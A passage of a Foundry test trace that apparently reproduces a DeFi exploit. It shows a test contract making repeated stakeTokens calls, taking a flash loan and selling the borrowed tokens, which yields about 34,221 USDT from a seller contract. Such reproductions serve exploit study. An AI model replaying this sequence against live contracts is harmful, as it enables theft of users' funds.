    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 15552000 [1.555e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1745047645 [1.745e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d97: 0 → 0x000000000000000000000000000000000000000000000000000000006803505d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 5 → 6
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d96: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 18144000 [1.814e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1747639645 [1.747e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 6 → 7
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d98: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d99: 0 → 0x00000000000000000000000000000000000000000000000000000000682add5d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 20736000 [2.073e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1750231645 [1.75e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9a: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9b: 0 → 0x0000000000000000000000000000000000000000000000000000000068526a5d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 7 → 8
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 23328000 [2.332e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1752823645 [1.752e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9d: 0 → 0x000000000000000000000000000000000000000000000000000000006879f75d
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9c: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 8 → 9
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 25920000 [2.592e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1755415645 [1.755e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9f: 0 → 0x0000000000000000000000000000000000000000000000000000000068a1845d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 9 → 10
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9e: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 28512000 [2.851e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1758007645 [1.758e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 10 → 11
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da0: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da1: 0 → 0x0000000000000000000000000000000000000000000000000000000068c9115d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 31104000 [3.11e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1760599645 [1.76e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da3: 0 → 0x0000000000000000000000000000000000000000000000000000000068f09e5d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 11 → 12
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da2: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 33696000 [3.369e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1763191645 [1.763e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da5: 0 → 0x0000000000000000000000000000000000000000000000000000000069182b5d
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da4: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 12 → 13
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 36288000 [3.628e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1765783645 [1.765e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 13 → 14
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da6: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da7: 0 → 0x00000000000000000000000000000000000000000000000000000000693fb85d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 38880000 [3.888e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1768375645 [1.768e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da8: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da9: 0 → 0x000000000000000000000000000000000000000000000000000000006967455d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 14 → 15
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 41472000 [4.147e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1770967645 [1.77e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2daa: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 15 → 16
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dab: 0 → 0x00000000000000000000000000000000000000000000000000000000698ed25d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 44064000 [4.406e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1773559645 [1.773e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dad: 0 → 0x0000000000000000000000000000000000000000000000000000000069b65f5d
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dac: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 16 → 17
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 46656000 [4.665e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1776151645 [1.776e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 17 → 18
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dae: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2daf: 0 → 0x0000000000000000000000000000000000000000000000000000000069ddec5d
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 49248000 [4.924e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1778743645 [1.778e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2db1: 0 → 0x000000000000000000000000000000000000000000000000000000006a05795d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 18 → 19
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2db0: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─ [47378] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::stakeTokens(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 74850000000000000000 [7.485e19], 51840000 [5.184e7])
    │   │   │   │   ├─ emit TokensStaked(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 74850000000000000000 [7.485e19], param2: 1781335645 [1.781e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2db3: 0 → 0x000000000000000000000000000000000000000000000000000000006a2d065d
    │   │   │   │   │   @ 0x2693936b7dd26548888d070d1ff4ae2403b4eb4731226afcaca7ee5f3fcb35a1: 19 → 20
    │   │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2db2: 0 → 0x0000000000000000000000000000000000000000000000040ec09e6d7dfd0000
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   ├─  emit topic 0: 0xe5c69b5e1b7973b81b6b987b42a90dea64f3dfc8b30caecfac73388c22a1c393
    │   │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d95: 0 → 0x0000000000000000000000000000000000000000000000000000000067dbc35d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dab: 0 → 0x00000000000000000000000000000000000000000000000000000000698ed25d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d91: 0 → 0x00000000000000000000000000000000000000000000000000000000678ca95d
    │   │   │   │   @ 0x142b3a79d7051f6cf5d22b3faba33688b2d988f09ea05564d4c77a9677b8c930: 0x000000000000000000000000000000000000000000000051305c3b49e156f819 → 0x000000000000000000000000000000000000000000000000094fdabc0992f819
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d93: 0 → 0x0000000000000000000000000000000000000000000000000000000067b4365d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da3: 0 → 0x0000000000000000000000000000000000000000000000000000000068f09e5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da9: 0 → 0x000000000000000000000000000000000000000000000000000000006967455d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d97: 0 → 0x000000000000000000000000000000000000000000000000000000006803505d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9f: 0 → 0x0000000000000000000000000000000000000000000000000000000068a1845d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2dad: 0 → 0x0000000000000000000000000000000000000000000000000000000069b65f5d
    │   │   │   │   @ 0xefc9a3523dab9abc56dc88806b4a7faa979322c51c3d06e93e3a07c64cb972c9: 0x000000000000000000000000000000000000000000000001f184c90efdc10000 → 0x00000000000000000000000000000000000000000000004f09d08b2f57880000
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2db1: 0 → 0x000000000000000000000000000000000000000000000000000000006a05795d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da1: 0 → 0x0000000000000000000000000000000000000000000000000000000068c9115d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da5: 0 → 0x0000000000000000000000000000000000000000000000000000000069182b5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2daf: 0 → 0x0000000000000000000000000000000000000000000000000000000069ddec5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8f: 0 → 0x0000000000000000000000000000000000000000000000000000000067651c5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d8d: 0 → 0x00000000000000000000000000000000000000000000000000000000673d8f5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d99: 0 → 0x00000000000000000000000000000000000000000000000000000000682add5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9d: 0 → 0x000000000000000000000000000000000000000000000000000000006879f75d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2d9b: 0 → 0x0000000000000000000000000000000000000000000000000000000068526a5d
    │   │   │   │   @ 0x03b8273c0fd106a7a9637c2a20dc87aedebcb455453ae991e59726e2eaaf2da7: 0 → 0x00000000000000000000000000000000000000000000000000000000693fb85d
    │   │   │   └─ ← [Stop]
    │   │   ├─ [580] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1497000000000000000000 [1.497e21]
    │   │   ├─ [0] console::log(1497000000000000000000 [1.497e21]) [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [580] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1497000000000000000000 [1.497e21]
    │   │   ├─ [24675] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::approve(0x493361D6164093936c86Dcb35Ad03b4C0D032076, 1497000000000000000000 [1.497e21])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x493361D6164093936c86Dcb35Ad03b4C0D032076, value: 1497000000000000000000 [1.497e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xca59b6aaf5d96c23cbea6fdb0b402f05f8cf994503ebfcc4615d53f0d9c354e9: 0 → 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [193686] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x493361D6164093936c86Dcb35Ad03b4C0D032076, 1497000000000000000000 [1.497e21], 0x)
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1497000000000000000000 [1.497e21])
    │   │   │   ├─ [144258] ContractTest::onFlashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x493361D6164093936c86Dcb35Ad03b4C0D032076, 1497000000000000000000 [1.497e21], 0, 0x)
    │   │   │   │   ├─ [30109] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::getFreeBalance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000051270c608dd7c40000
    │   │   │   │   ├─ [24675] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::approve(0xf738de9913bc1e21b1a985bb0E39Db75091263b7, 115792089237316195423570985008687907853269984665640564039457584007913129639934 [1.157e77])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xf738de9913bc1e21b1a985bb0E39Db75091263b7, value: 115792089237316195423570985008687907853269984665640564039457584007913129639934 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x75b0c2b257fad97454a30f900b349c101d327cbc3b0be37fbf716275dd9640f9: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [78872] 0xf738de9913bc1e21b1a985bb0E39Db75091263b7::sell(34221419999999999999999 [3.422e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─ [2362] 0xB9c3401c846f3aC4ccD2BDB1901E41C1dA463E10::price() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000013d3f08e1ed6e0000
    │   │   │   │   │   ├─ [841] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::allowance(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xf738de9913bc1e21b1a985bb0E39Db75091263b7)
    │   │   │   │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639934 [1.157e77]
    │   │   │   │   │   ├─ [42877] 0x493361D6164093936c86Dcb35Ad03b4C0D032076::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xf738de9913bc1e21b1a985bb0E39Db75091263b7, 1496999999999999999999 [1.496e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xf738de9913bc1e21b1a985bb0E39Db75091263b7, value: 115792089237316195423570985008687907853269984665640564037960584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xf738de9913bc1e21b1a985bb0E39Db75091263b7, value: 1496999999999999999999 [1.496e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x75b0c2b257fad97454a30f900b349c101d327cbc3b0be37fbf716275dd9640f9: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe → 0xffffffffffffffffffffffffffffffffffffffffffffffaed8f39f72283bffff
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000a24e18c11baf880000 → 0x000000000000000000000000000000000000000000000051270c608dd7c40001
    │   │   │   │   │   │   │   @ 0xc8b8a015c250b7cb450f75ebec8382cc039adffb29d8e2b0a543cd8d960955a2: 0x000000000000000000000000000000000000000000000331925c88a4e464995d → 0x000000000000000000000000000000000000000000000382b968e932bc28995c
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 34221419999999999999999 [3.422e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xf738de9913bc1e21b1a985bb0E39Db75091263b7, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 34221419999999999999999 [3.422e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000073f259af125683dffff
    │   │   │   │   │   │   │   @ 0xa75ab6f69227eb63c79585c1924f21bb06031ed81b62024584ff45e1bd3437ae: 0x0000000000000000000000000000000000000000000007b8353950a6d2497a7c → 0x0000000000000000000000000000000000000000000000790f9e5f816a0b7a7d
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x75b0c2b257fad97454a30f900b349c101d327cbc3b0be37fbf716275dd9640f9: 0 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
    │   │   │   │   └─ ← [Return] 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x493361D6164093936c86Dcb35Ad03b4C0D032076, value: 0)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1497000000000000000000 [1.497e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000000051270c608dd7c40000 → 1
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000073f259af125683dffff
    │   │   │   │   @ 0x0175b7a638427703f0dbe7bb9bbf987a2551717b34e79f33b5b1008d1fa01f71: 0 → 0x00000000000000000000000000000000001155715f54bb14818e4e9c0294c915
    │   │   │   │   @ 11: 440 → 441
    │   │   │   │   @ 0xca59b6aaf5d96c23cbea6fdb0b402f05f8cf994503ebfcc4615d53f0d9c354e9: 0x000000000000000000000000000000000000000000000051270c608dd7c40000 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x36696169C63e42cd08ce11f5deeBbCeBae652050, 1500750000000000000000 [1.5e21])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x36696169C63e42cd08ce11f5deeBbCeBae652050, value: 1500750000000000000000 [1.5e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4b4dfb61299ca62a744d1ae05c6e24e84740e94efd86eec09992191d35df35c4: 0x00000000000000000000000000000000000000000023ec61bd8d177cd20ad536 → 0x00000000000000000000000000000000000000000023ecb318a4252c5d85d536
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000073f259af125683dffff → 0x0000000000000000000000000000000000000000000006edca83e375dcc2ffff
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x0175b7a638427703f0dbe7bb9bbf987a2551717b34e79f33b5b1008d1fa01f71: 0x00000000000000000000000000000000001155c286611ba259524e9c0294c915 → 0x00000000000000000000000000000000001155715f54bb14818e4e9c0294c915
    │   │   │   @ 0x142b3a79d7051f6cf5d22b3faba33688b2d988f09ea05564d4c77a9677b8c930: 0 → 0x000000000000000000000000000000000000000000000051305c3b49e156f819
